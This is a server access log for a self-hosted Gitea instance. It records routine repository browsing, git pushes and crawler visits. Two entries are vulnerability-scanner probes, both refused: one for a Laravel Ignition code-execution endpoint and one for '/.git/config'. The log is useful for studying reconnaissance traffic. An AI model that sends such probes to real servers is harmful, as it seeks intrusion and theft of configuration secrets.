"-" -[16/Feb/2026:13:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17344] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 28004] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/notifications/new" [Client 222.117.41.51] [Length 10] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:16:23:33 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/_ignition/execute-solution" [Client 98.87.163.10] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15" "-" -[16/Feb/2026:19:08:31 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:19:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:19:08:31 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:22:05:29 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 185.247.137.74] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" -[16/Feb/2026:22:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 185.247.137.74] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "http://git.hanmocnn.co.kr" -[16/Feb/2026:22:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 87.236.176.8] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" -[16/Feb/2026:22:05:32 +0000] - 301 301 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 87.236.176.137] [Length 58] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" -[16/Feb/2026:22:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 87.236.176.137] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "https://git.hanmocnn.co.kr/favicon.ico" -[16/Feb/2026:23:44:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" -[17/Feb/2026:02:36:30 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:02:36:31 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:02:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:02:36:39 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:02:36:40 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:02:36:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11653] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:50 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:02:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20243] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 23.27.145.104] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" -[17/Feb/2026:02:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" [Client 222.117.41.51] [Length 195663] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 27] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:03:39:35 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 64.23.133.131] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" -[17/Feb/2026:03:39:35 +0000] - - 301 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 64.23.133.131] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "http://git.hanmocnn.co.kr/" -[17/Feb/2026:03:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 64.23.133.131] [Length 5678] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" -[17/Feb/2026:03:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 64.23.133.131] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:06:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 23.27.145.119] [Length 5679] [Gzip 2.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" -[17/Feb/2026:07:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11653] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20269] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11652] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:08:40:22 +0000] - 304 304 - 